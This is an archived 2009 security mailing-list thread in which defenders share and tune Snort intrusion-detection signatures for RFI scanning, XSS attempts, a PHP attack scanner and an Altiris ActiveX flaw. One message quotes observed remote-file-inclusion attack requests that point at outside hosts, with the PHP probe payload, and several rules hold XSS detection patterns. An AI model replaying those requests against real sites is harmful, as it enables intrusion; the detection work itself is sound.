From mike.cox52 at gmail.com  Fri Dec 11 09:41:31 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Fri, 11 Dec 2009 08:41:31 -0600
Subject: [Emerging-Sigs] RFI exploit successful
In-Reply-To: <4B22586B.6050108@secnap.net>
References: <6116b9e20912110614r3d39f955ga238f7b8b27b9b20@mail.gmail.com>
	<4B22586B.6050108@secnap.net>
Message-ID: <6116b9e20912110641t39e7bd2dyfd8f9deccc48fe40@mail.gmail.com>

Right, that is why it is current events.  I figured it could help identify
vulnerable/exploited systems over the next day or three or at least until it
changes.

Mike Cox

On Fri, Dec 11, 2009 at 8:34 AM, Michael Scheidell <scheidell at secnap.net>wrote:

>  Mike Cox wrote:
>
> I'm seeing the "Remote File Inclusion (monstor list http)" fire for RFI
> scanning with requests like this:
>
> GET /product.php?id=http://kb27.co.kr/data/id1.txt?? HTTP/1.1
> GET /product.php?id=http://n34.biz/id1.txt???? HTTP/1.1
>
> The file that is attempted to be included is this:
>
> <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
>
>  That tag changes a lot!, I have seen several varations on it, so that one,
> secifically, will only match some of them.
>
>
>
> --
> Michael Scheidell, CTO
> Phone: 561-999-5000, x 1259
> > *| *SECNAP Network Security Corporation
>
>    - Certified SNORT Integrator
>    - 2008-9 Hot Company Award Winner, World Executive Alliance
>    - Five-Star Partner Program 2009, VARBusiness
>    - Best Anti-Spam Product 2008, Network Products Guide
>    - King of Spam Filters, SC Magazine 2008
>
>
> ------------------------------
>
> This email has been scanned and certified safe by SpammerTrap?.
> For Information please see http://www.secnap.com/products/spammertrap/
> ------------------------------
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/92124e7d/attachment-0001.html

From kevross33 at googlemail.com  Fri Dec 11 09:41:58 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Fri, 11 Dec 2009 14:41:58 +0000
Subject: [Emerging-Sigs] SIG: Barracuda IM Firewall XSS
Message-ID: <e75cc74a0912110641t6b03130en82d3503c6d21aaa2@mail.gmail.com>

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting Attempt";
flow:established,to_server;
uricontent:"|2F|cgi|2D|mod|2F|smtp|5F|test|2E|cgi"; nocase;
uricontent:"email|3D|"; nocase; uricontent:"hostname|3D|"; nocase;
uricontent:"default|5F|domain|3D|"; nocase;
pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
classtype:web-application-attack; reference:url,
www.securityfocus.com/bid/37248/info; sid:19000002; rev:1;)

Kev
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/eedfde04/attachment.html

From mike.cox52 at gmail.com  Fri Dec 11 10:09:32 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Fri, 11 Dec 2009 09:09:32 -0600
Subject: [Emerging-Sigs] Generic XSS Detection (was: Re:  2 Cisco Sigs)
Message-ID: <6116b9e20912110709u3f114c09m5524eac8dee6a24b@mail.gmail.com>

I see a lot of XSS flaws where the user supplied content is returned in
areas of code that are already surrounded by <script> tags.  In other words,
the user supplied content is being used by javascript normally.  In these
cases, looking for terms like "script" or "onload" are powerless to detect
exploitation.  Therefore I suggest that instead of a generic and lazy
copy-and-paste template to detect XSS attempts, we make an effort to
understand the vulnerabilities and actually create specific signatures for
it. For example, if applicable, detect the insertion of a single or double
quote in the vulnerable parameter.  Generic XSS sigs have their place but I
fear we are missing good coverage by just copying and pasting old XSS sigs
and filling in the appropriate URI values.  Kind of like what has happened
to ActiveX sigs.

Mike Cox

On Thu, Dec 10, 2009 at 3:13 PM, evilghost at packetmail.net <
evilghost at packetmail.net> wrote:

> Adjusted PCRE, I like this one better:
>
>
> pcre:"/(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>
>
>
> evilghost at packetmail.net wrote:
> > Matt, since we're detecting XSS I'd like to modify the signatures PCRE
> > (proposed earlier in the year) for these XSS sigs to catch all of the
> > DOM behaviors.  I could go back and modify all of Kevin's sigs and get a
> > huge COMBO-BREAKER and integer overflow the ET scoreboard.  I'll just
> > submit these two and if you agree, perhaps you can go back against the
> > XSS signs and sed in this new PCRE?
> >
> > See
> >
> http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-November/004539.html
> > for the discussion.  I don't think matching on "src" or "img" in the
> > PCRE URI buffer is wise since it should be covered by the other DOM
> > event handlers.
> >
> >
> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
> >
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
> Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt";
> > flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B
> 2F|index|2E|html|20|HTTP|2F|"; depth:31;
> > nocase; content:"Host|3A|"; within:20;
> >
> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
> > classtype:attempted-user; reference:url,
> www.securityfocus.com/bid/34307/info; reference:url,
> tools.cisco.com/security/center/viewAlert.x?alertId=17950;
> > reference:cve,2009-1220; sid:14000001; rev:1;)
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
> Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt";
> > flow:established,to_server;
> uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase;
> >
> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
> > classtype:attempted-user; reference:url,
> www.securityfocus.com/bid/29191/info; reference:cve,2008-2165;
> sid:14000002; rev:1;)
> >
> > - evilghost
> >
> > Matt Jonkman wrote:
> >
> >> Posted, thanks Kevin!!
> >>
> >> Matt
> >>
> >> On Dec 10, 2009, at 3:40 PM, Kevin Ross wrote:
> >>
> >>
> >>
> >>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
> WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting
> Attempt"; flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B
> 2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|";
> within:20;
> pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
> classtype:attempted-user; reference:url,
> www.securityfocus.com/bid/34307/info; reference:url,
> tools.cisco.com/security/center/viewAlert.x?alertId=17950;
> reference:cve,2009-1220; sid:14000001; rev:1;)
> >>>
> >>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
> WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting
> Attempt"; flow:established,to_server;
> uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase;
> pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
> classtype:attempted-user; reference:url,
> www.securityfocus.com/bid/29191/info; reference:cve,2008-2165;
> sid:14000002; rev:1;)
> >>>
> >>>
> >> ----------------------------------------------------
> >> Matthew Jonkman
> >> Emerging Threats
> >> Open Information Security Foundation (OISF)
> >> Phone 765-429-0398
> >> Fax 312-264-0205
> >> http://www.emergingthreats.net
> >> http://www.openinformationsecurityfoundation.org
> >> ----------------------------------------------------
> >>
> >> PGP: http://www.jonkmans.com/mattjonkman.asc
> >>
> >>
> >>
> >> _______________________________________________
> >> Emerging-sigs mailing list
> >> Emerging-sigs at emergingthreats.net
> >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >>
> >>
> >>
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> >
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/a7ca53fb/attachment.html

From kevross33 at googlemail.com  Fri Dec 11 10:53:59 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Fri, 11 Dec 2009 15:53:59 +0000
Subject: [Emerging-Sigs] Generic XSS Detection (was: Re: 2 Cisco Sigs)
In-Reply-To: <6116b9e20912110709u3f114c09m5524eac8dee6a24b@mail.gmail.com>
References: <6116b9e20912110709u3f114c09m5524eac8dee6a24b@mail.gmail.com>
Message-ID: <e75cc74a0912110753h79e0a6cclb277964a9f98438f@mail.gmail.com>

I am all for improving on the sigs to provide better coverage. I always knew
it won't be 100% effective the template I came up with but it is better than
no detection. Feel free to improve on my sigs as it means better coverage
for my networks too :)

2009/12/11 Mike Cox <mike.cox52 at gmail.com>

> I see a lot of XSS flaws where the user supplied content is returned in
> areas of code that are already surrounded by <script> tags.  In other words,
> the user supplied content is being used by javascript normally.  In these
> cases, looking for terms like "script" or "onload" are powerless to detect
> exploitation.  Therefore I suggest that instead of a generic and lazy
> copy-and-paste template to detect XSS attempts, we make an effort to
> understand the vulnerabilities and actually create specific signatures for
> it. For example, if applicable, detect the insertion of a single or double
> quote in the vulnerable parameter.  Generic XSS sigs have their place but I
> fear we are missing good coverage by just copying and pasting old XSS sigs
> and filling in the appropriate URI values.  Kind of like what has happened
> to ActiveX sigs.
>
> Mike Cox
>
> On Thu, Dec 10, 2009 at 3:13 PM, evilghost at packetmail.net <
> evilghost at packetmail.net> wrote:
>
>> Adjusted PCRE, I like this one better:
>>
>>
>> pcre:"/(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>>
>>
>>
>> evilghost at packetmail.net wrote:
>> > Matt, since we're detecting XSS I'd like to modify the signatures PCRE
>> > (proposed earlier in the year) for these XSS sigs to catch all of the
>> > DOM behaviors.  I could go back and modify all of Kevin's sigs and get a
>> > huge COMBO-BREAKER and integer overflow the ET scoreboard.  I'll just
>> > submit these two and if you agree, perhaps you can go back against the
>> > XSS signs and sed in this new PCRE?
>> >
>> > See
>> >
>> http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-November/004539.html
>> > for the discussion.  I don't think matching on "src" or "img" in the
>> > PCRE URI buffer is wise since it should be covered by the other DOM
>> > event handlers.
>> >
>> >
>> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>> >
>> >
>> > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
>> Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt";
>> > flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B
>> 2F|index|2E|html|20|HTTP|2F|"; depth:31;
>> > nocase; content:"Host|3A|"; within:20;
>> >
>> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>> > classtype:attempted-user; reference:url,
>> www.securityfocus.com/bid/34307/info; reference:url,
>> tools.cisco.com/security/center/viewAlert.x?alertId=17950;
>> > reference:cve,2009-1220; sid:14000001; rev:1;)
>> >
>> > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
>> Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt";
>> > flow:established,to_server;
>> uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase;
>> >
>> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>> > classtype:attempted-user; reference:url,
>> www.securityfocus.com/bid/29191/info; reference:cve,2008-2165;
>> sid:14000002; rev:1;)
>> >
>> > - evilghost
>> >
>> > Matt Jonkman wrote:
>> >
>> >> Posted, thanks Kevin!!
>> >>
>> >> Matt
>> >>
>> >> On Dec 10, 2009, at 3:40 PM, Kevin Ross wrote:
>> >>
>> >>
>> >>
>> >>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
>> WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting
>> Attempt"; flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B
>> 2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|";
>> within:20;
>> pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
>> classtype:attempted-user; reference:url,
>> www.securityfocus.com/bid/34307/info; reference:url,
>> tools.cisco.com/security/center/viewAlert.x?alertId=17950;
>> reference:cve,2009-1220; sid:14000001; rev:1;)
>> >>>
>> >>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
>> WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting
>> Attempt"; flow:established,to_server;
>> uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase;
>> pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
>> classtype:attempted-user; reference:url,
>> www.securityfocus.com/bid/29191/info; reference:cve,2008-2165;
>> sid:14000002; rev:1;)
>> >>>
>> >>>
>> >> ----------------------------------------------------
>> >> Matthew Jonkman
>> >> Emerging Threats
>> >> Open Information Security Foundation (OISF)
>> >> Phone 765-429-0398
>> >> Fax 312-264-0205
>> >> http://www.emergingthreats.net
>> >> http://www.openinformationsecurityfoundation.org
>> >> ----------------------------------------------------
>> >>
>> >> PGP: http://www.jonkmans.com/mattjonkman.asc
>> >>
>> >>
>> >>
>> >> _______________________________________________
>> >> Emerging-sigs mailing list
>> >> Emerging-sigs at emergingthreats.net
>> >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >>
>> >>
>> >>
>> > _______________________________________________
>> > Emerging-sigs mailing list
>> > Emerging-sigs at emergingthreats.net
>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >
>> >
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/e08d90c5/attachment-0001.html

From mike.cox52 at gmail.com  Fri Dec 11 12:34:01 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Fri, 11 Dec 2009 11:34:01 -0600
Subject: [Emerging-Sigs] Morfeus F Scanner User-Agent
Message-ID: <6116b9e20912110934p70b01d6ex1a4bb300eae49a34@mail.gmail.com>

I propose we anchor the User-Agent in SID 2006466.  Go from:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
Attack Tool Morfeus F Scanner"; flow:established,to_server;
content:"User-Agent|3a| Morfeus "; nocase; reference:url,
www.webmasterworld.com/search_engine_spiders/3227720.htm;
classtype:web-application-attack; reference:url,
doc.emergingthreats.net/2003466; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
sid:2003466; rev:8;)

To:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
Attack Tool Morfeus F Scanner"; flow:established,to_server;
content:"|0d 0a|User-Agent|3a|
Morfeus "; nocase; reference:url,
www.webmasterworld.com/search_engine_spiders/3227720.htm;
classtype:web-application-attack; reference:url,
doc.emergingthreats.net/2003466; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
sid:2003466; rev:9;)

Can also do the same to 20097899 like so:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
Attack Tool Morfeus F Scanner - M"; flow:established,to_server; content:"|0d
0a|User-Agent|3a| M Fucking Scanner"; nocase; reference:url,
www.webmasterworld.com/search_engine_spiders/3227720.htm;
classtype:web-application-attack; reference:url,
doc.emergingthreats.net/2003466; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
sid:2009799; rev:4;)


Mike Cox
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/a88b5ba6/attachment.html

From evilghost at packetmail.net  Fri Dec 11 14:12:25 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Fri, 11 Dec 2009 13:12:25 -0600
Subject: [Emerging-Sigs] Morfeus F Scanner User-Agent
In-Reply-To: <6116b9e20912110934p70b01d6ex1a4bb300eae49a34@mail.gmail.com>
References: <6116b9e20912110934p70b01d6ex1a4bb300eae49a34@mail.gmail.com>
Message-ID: <4B229999.7060809@packetmail.net>

Agree, perhaps we can review the user-agents and anchor, I found several 
that are not anchored.  I don't see them false often (or even at all) so 
we may be chasing panacea.

Mike Cox wrote:
> I propose we anchor the User-Agent in SID 2006466.  Go from:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
> Attack Tool Morfeus F Scanner"; flow:established,to_server;
> content:"User-Agent|3a| Morfeus "; nocase; reference:url,
> www.webmasterworld.com/search_engine_spiders/3227720.htm;
> classtype:web-application-attack; reference:url,
> doc.emergingthreats.net/2003466; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
> sid:2003466; rev:8;)
>
> To:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
> Attack Tool Morfeus F Scanner"; flow:established,to_server;
> content:"|0d 0a|User-Agent|3a|
> Morfeus "; nocase; reference:url,
> www.webmasterworld.com/search_engine_spiders/3227720.htm;
> classtype:web-application-attack; reference:url,
> doc.emergingthreats.net/2003466; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
> sid:2003466; rev:9;)
>
> Can also do the same to 20097899 like so:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
> Attack Tool Morfeus F Scanner - M"; flow:established,to_server; content:"|0d
> 0a|User-Agent|3a| M Fucking Scanner"; nocase; reference:url,
> www.webmasterworld.com/search_engine_spiders/3227720.htm;
> classtype:web-application-attack; reference:url,
> doc.emergingthreats.net/2003466; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
> sid:2009799; rev:4;)
>
>
> Mike Cox
>
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>   

From kevross33 at googlemail.com  Fri Dec 11 14:27:49 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Fri, 11 Dec 2009 19:27:49 +0000
Subject: [Emerging-Sigs] wooo I got the sig right
Message-ID: <e75cc74a0912111127j6f3d39f9pe20781f852e1eed9@mail.gmail.com>

I wrote a sig a few weeks ago for and Altiris server RunCmd vulnerability
(see below). I was not 100% sure of its accuracy. Now an exploit module has
been released for metasploit to take advantage of this vulnerability which
you can see here
http://www.metasploit.com/redmine/projects/framework/repository/revisions/7821and
it turns out my sigs are right to provide coverage for this
(especially
as the organisation I work for uses Altiris, though of course it is weakened
in it's coverage by obfuscation but it is better than no coverage).

It certainly brings home that being able to write your own sigs for an
IDS/IPS is far better than a closed signature model you get with some
vendors, relying on them like a baby at a mother's teat. Especially as the
sig may never come unless you write it yourself (especially in the case of
obscure technologies). Again and again I am glad to use Snort and all the
effort that has gone into it's engine and sigs to make it a great tool for
all networks.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT
Possible Symantec Altiris Deployment Solution and Notification Server
ActiveX Control RunCmd Arbitrary Code Execution Attempt";
flow:established,to_client; content:"clsid"; nocase;
content:"B44D252D-98FC-4D5C-948C-BE868392A004"; nocase; distance:0;
content:"RunCmd"; nocase;
pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B44D252D-98FC-4D5C-948C-BE868392A004/si";
classtype:attempted-user; reference:url,
securitytracker.com/alerts/2009/Nov/1023238.html; reference:url,
www.securityfocus.com/bid/37092; reference:cve,2009-3033; reference:url,
doc.emergingthreats.net/2010369; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec;
sid:2010369; rev:2;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET WEB_CLIENT
ACTIVEX Possible Symantec Altiris Deployment Solution and Notification
Server ActiveX Control RunCmd Arbitrary Code Execution Function Call
Attempt"; flow:to_client,established; content:"ActiveXObject"; nocase;
content:"Altiris.AeXNSConsoleUtilities"; nocase; distance:0;
content:"RunCmd"; nocase; classtype:attempted-user; reference:url,
securitytracker.com/alerts/2009/Nov/1023238.html; reference:url,
www.securityfocus.com/bid/37092; reference:cve,2009-3033; reference:url,
doc.emergingthreats.net/2010370; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec;
sid:2010370; rev:2;)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/308c4273/attachment.html

From emerging at emergingthreats.net  Fri Dec 11 16:00:17 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 11 Dec 2009 16:00:17 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091211210017.5E9B94504E@goliath.jonkmans.com>


[***] Results from Oinkmaster started Fri Dec 11 16:00:17 2009 [***]

[+++]          Added rules:          [+++]

 2010461 - ET USER_AGENTS Suspicious UA string (MSIE7 an) (emerging-user_agents.rules)


[---]         Removed rules:         [---]

20010455 - ET USER_AGENTS Suspicious UA string (MSIE7 an) (emerging-user_agents.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (1):
        2010461 || ET USER_AGENTS Suspicious UA string (MSIE7 an)

     -> Added to emerging-sid-msg.map.txt (1):
        2010461 || ET USER_AGENTS Suspicious UA string (MSIE7 an)

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (81):
        2500382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
